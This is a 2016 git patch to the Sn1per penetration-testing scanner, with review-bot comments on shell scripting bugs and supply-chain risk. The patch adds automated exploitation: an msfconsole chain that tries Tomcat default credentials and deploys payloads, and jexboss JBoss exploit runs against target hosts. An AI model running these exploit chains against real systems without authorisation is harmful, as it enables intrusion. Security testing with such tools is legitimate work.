From 1633aa16f2bcdf25be8eb372e477ac2416a04784 Mon Sep 17 00:00:00 2001 From: root Date: Sun, 10 Apr 2016 20:58:34 -0700 Subject: [PATCH] Sn1per by 1N3 @CrowdShield --- README.md | 6 ++++++ install.sh | 4 +++- loot/README.md | 6 ++++++ sniper | 17 ++++++++++++++--- 4 files changed, 29 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index f6b488d..986e3b1 100644 --- a/README.md +++ b/README.md @@ -13,7 +13,9 @@ Sn1per is an automated scanner that can be used during a penetration test to enu * Automatically runs targeted Metasploit scan and exploit modules * Automatically scans all web applications for common vulnerabilities * Automatically brute forces all open services +* Automatically exploit remote hosts to gain remote shell access * Performs high level enumeration of multiple hosts +* Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds ## INSTALL: ``` @@ -46,6 +48,10 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc ``` ## CHANGELOG: +* v1.6d - Added xprobe2 OS finger printing tool +* v1.6d - Added jexbos JBoss autopwn +* v1.6d - Merged fix for theharvester package (CC. @RubenRocha) +* v1.6d - Merged fix for SuperMicroScanner (CC. @mero01) * v1.6c - Add report mode for web scans * v1.6c - Fixed issues with Sublist3r and theharvester * v1.6c - Added Shocker Shellshock exploitation scanner diff --git a/install.sh b/install.sh index 740f626..f07329b 100644 --- a/install.sh +++ b/install.sh 
@@ -24,7 +24,7 @@ echo -e "$OKGREEN + -- --=[This script will install or upgrade your Sn1per insta read answer echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET" -apt-get install cutycapt unicornscan waffit host whois arachni theHarvester dnsenum dirb dnsrecon curl nmap php5 php5-curl wapiti hydra iceweasel wpscan sqlmap arachni w3af golismero nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb python nbtscan sslscan amap +apt-get install xprobe2 cutycapt unicornscan waffit host whois arachni theharvester dnsenum dirb dnsrecon curl nmap php5 php5-curl wapiti hydra iceweasel wpscan sqlmap arachni w3af golismero nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb python nbtscan sslscan amap echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET" gem install rake @@ -45,6 +45,7 @@ git clone https://github.com/0xsauby/yasuo.git git clone https://github.com/johndekroon/serializekiller.git git clone https://github.com/aboul3la/Sublist3r.git git clone https://github.com/nccgroup/shocker.git +git clone https://github.com/joaomatosf/jexboss.git echo -e "$OKORANGE + -- --=[Setting up environment...$RESET" mkdir loot 2> /dev/null @@ -55,6 +56,7 @@ chmod +x $DIR/XSSTracer/xsstracer.py chmod +x $DIR/MassBleed/massbleed chmod +x $DIR/MassBleed/heartbleed.py chmod +x $DIR/MassBleed/openssl_ccs.pl +chmod +x $DIR/SuperMicro-Password-Scanner/supermicro_scan.sh rm -f /usr/bin/sniper rm -f /usr/bin/goohak rm -f /usr/bin/xsstracer diff --git a/loot/README.md b/loot/README.md index f6b488d..986e3b1 100644 --- a/loot/README.md +++ b/loot/README.md 
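Review bot: The rewritten `apt-get install` line in the `@@ -24,7` hunk now lists `theharvester` twice (the corrected first entry plus the one already near the end), next to the existing duplicates of `arachni`, `dnsenum` and `nbtscan`. Its exit status is also never checked in the lines shown. If one package, such as the newly added `xprobe2`, cannot be located, apt-get aborts the whole transaction and the script appears to carry on to the gem and git steps with nothing installed. I would de-duplicate the list and stop on failure, e.g. `apt-get install ... || { echo "package install failed" >&2; exit 1; }`.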
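Review bot: The added `git clone https://github.com/joaomatosf/jexboss.git` in the `@@ -45,6` hunk fetches whatever the default branch holds at install time, and the `sniper` hunk at `@@ -821,6` later executes that code. Nothing pins or verifies the content, and the installer looks to be run with root privileges (it rewrites `/usr/bin/sniper`), so a compromised or force-pushed upstream becomes code execution on the tester's machine. Consider checking out a reviewed commit straight after the clone, e.g. `git -C jexboss checkout --detach <REVIEWED_COMMIT_SHA>`, and aborting the install if the clone or checkout fails. The same applies to the neighbouring clones shown as context.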
@@ -13,7 +13,9 @@ Sn1per is an automated scanner that can be used during a penetration test to enu * Automatically runs targeted Metasploit scan and exploit modules * Automatically scans all web applications for common vulnerabilities * Automatically brute forces all open services +* Automatically exploit remote hosts to gain remote shell access * Performs high level enumeration of multiple hosts +* Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds ## INSTALL: ``` @@ -46,6 +48,10 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc ``` ## CHANGELOG: +* v1.6d - Added xprobe2 OS finger printing tool +* v1.6d - Added jexbos JBoss autopwn +* v1.6d - Merged fix for theharvester package (CC. @RubenRocha) +* v1.6d - Merged fix for SuperMicroScanner (CC. @mero01) * v1.6c - Add report mode for web scans * v1.6c - Fixed issues with Sublist3r and theharvester * v1.6c - Added Shocker Shellshock exploitation scanner diff --git a/sniper b/sniper index 5db39cf..eaa7992 100644 --- a/sniper +++ b/sniper @@ -89,7 +89,7 @@ fi if [ "$MODE" = "stealth" ]; then if [ "$OPT1" = "report" ]; then - ./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 + ./sniper $TARGET $MODE | tee ./loot/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 exit fi echo -e "$OKRED ____ $RESET" 
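Review bot: In the stealth report branch of `sniper` (`@@ -89,7`) the `2>&1` sits after `tee`, so it redirects tee's stderr rather than the scan's, and error output from `./sniper` never reaches the report file. Dropping `$TARGET` from the name keeps the raw argument out of a path, but reports are now keyed only by mode and minute. Two targets scanned in the same minute therefore overwrite each other, and a saved report no longer identifies its host. I would write `./sniper "$TARGET" "$MODE" 2>&1 | tee "./loot/sniper-$MODE-$(date +%Y%m%d%H%M%S).txt"`, and if the target should stay in the name, sanitise it first (in bash, `${TARGET//[^A-Za-z0-9._-]/_}`). The identical line in the airstrike branch of the `@@ -150,17` hunk needs the same change; the enclosing `if` continues outside this hunk.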
@@ -150,17 +150,20 @@ if [ "$MODE" = "stealth" ]; then echo "" echo -e "$OKGREEN################################### Running passive scans #########################$RESET" unicornscan $TARGET 2> /dev/null + xprobe2 $TARGET wafw00f http://$TARGET whatweb http://$TARGET xsstracer $TARGET 80 sslscan --no-failed $TARGET cutycapt --url=http://$TARGET --out=loot/$TARGET-port80.jpg + echo -e "$OKGREEN################################### Done! #########################################$RESET" + clear exit fi if [ "$MODE" = "airstrike" ]; then if [ "$OPT1" = "report" ]; then - ./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 + ./sniper $TARGET $MODE | tee ./loot/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 exit fi echo -e "$OKRED ____ $RESET" @@ -217,11 +220,15 @@ if [ "$MODE" = "airstrike" ]; then echo "" echo -e "$OKGREEN################################### Running passive scans #########################$RESET" unicornscan $a 2> /dev/null + xprobe2 $TARGET wafw00f http://$a whatweb http://$a xsstracer $a 80 sslscan --no-failed $a cutycapt --url=http://$TARGET --out=loot/$TARGET-port80.jpg + echo -e "$OKGREEN################################### Done! #########################################$RESET" + clear + exit done; exit fi @@ -265,6 +272,7 @@ if [ "$MODE" = "nuke" ]; then echo -e "$OKRED --------------------------------------------------------- $RESET" echo -e "$OKGREEN + -- --=[WARNING! Nuking ALL target! $RESET" ./sniper $a + clear done fi @@ -281,6 +289,7 @@ echo -e "$RESET" echo -e "$OKGREEN################################### Running recon #################################$RESET" nslookup $TARGET host $TARGET +xprobe2 $TARGET if [ $SCAN_TYPE == "DOMAIN" ]; then dig -x $TARGET 
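Review bot: `xprobe2 $TARGET` is added under the "Running passive scans" banner in stealth mode (`@@ -150,17`), but xprobe2 fingerprints the OS by sending probe packets to the target, so the banner further understates what this mode does on the wire. That matters on engagements where only passive collection is authorised; either retitle the section or move the call out of stealth mode. `$TARGET` is also unquoted here and in the `@@ -281,6` recon hunk, so a value with spaces or a leading `-` is split or read as an option; validating the argument once at the top of the script and calling `xprobe2 "$TARGET"` would cover both. The added `clear` right after the "Done!" banner wipes the results from the terminal and, in report mode, writes the clear-screen escape sequence into the tee'd file.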
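Review bot: The `exit` added just before `done;` in the airstrike loop (`@@ -217,11`) ends the script after the first entry, so every later target in the list is silently skipped. The added `xprobe2 $TARGET`, like the existing `cutycapt` line, uses `$TARGET` where the surrounding commands use the loop variable `$a`. Here `$TARGET` appears to be the list being iterated rather than a single host, though the loop header is outside the hunk. I would drop the in-loop `exit` and `clear`, and call `xprobe2 "$a"`.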
@@ -302,7 +311,7 @@ if [ -z "$OPT1" ]; then nmap -sS -sV -T4 -A -O -p 1-65535 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml nmap -sU -sV -T4 -A -O -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 --open $TARGET elif [ "$OPT1" == "web" ]; then - nmap -sS -sV -T4 -A -O -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap-web-$TARGET.xml + nmap -sS -sV -T4 -A -O -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml else nmap -sS -sV -T4 -A -O -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml nmap -sU -sV -T4 -A -O -p U:$OPT1 --open $TARGET @@ -821,6 +830,8 @@ else nmap -p 8080 --script=*proxy* $TARGET #arachni http://$TARGET:8080 --output-only-positives msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;" + python jexboss/jexboss.py http://$TARGET:8080 + python jexboss/jexboss.py https://$TARGET:8080 fi if [ -z "$port_8180" ]
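Review bot: Writing the web-mode XML to `$LOOT_DIR/nmap-$TARGET.xml` (`@@ -302,7`) gives it the same filename as the full-scan and custom-port branches, so a later `web` run against the same host overwrites the earlier full-port results. If a downstream step expects that single name (not visible in this hunk), the rename is understandable, but the evidence loss is better avoided with a distinct or timestamped name, e.g. `-oX "$LOOT_DIR/nmap-web-$TARGET-$(date +%Y%m%d%H%M%S).xml"`. `$TARGET` and `$LOOT_DIR` are unquoted and `$TARGET` goes straight into a path, so a value containing `/` or spaces changes where the file lands.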
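Review bot: `python jexboss/jexboss.py` (`@@ -821,6`) is a relative path, so it resolves against the directory sniper is started from rather than the install directory. Since `install.sh` replaces `/usr/bin/sniper`, the script is likely run from arbitrary directories, where this either fails or runs a `jexboss/` tree that happens to be there. Anchor it to the install location and quote the URL, e.g. `python "$INSTALL_DIR/jexboss/jexboss.py" "http://$TARGET:8080"`, where `$INSTALL_DIR` is a placeholder for whatever variable the script uses for its own directory. Nothing in the hunk checks that the service on 8080 is JBoss or asks the operator before the tool is launched, so a guard or prompt would help keep the run inside the agreed scope. The enclosing `if`/`else` starts outside the hunk.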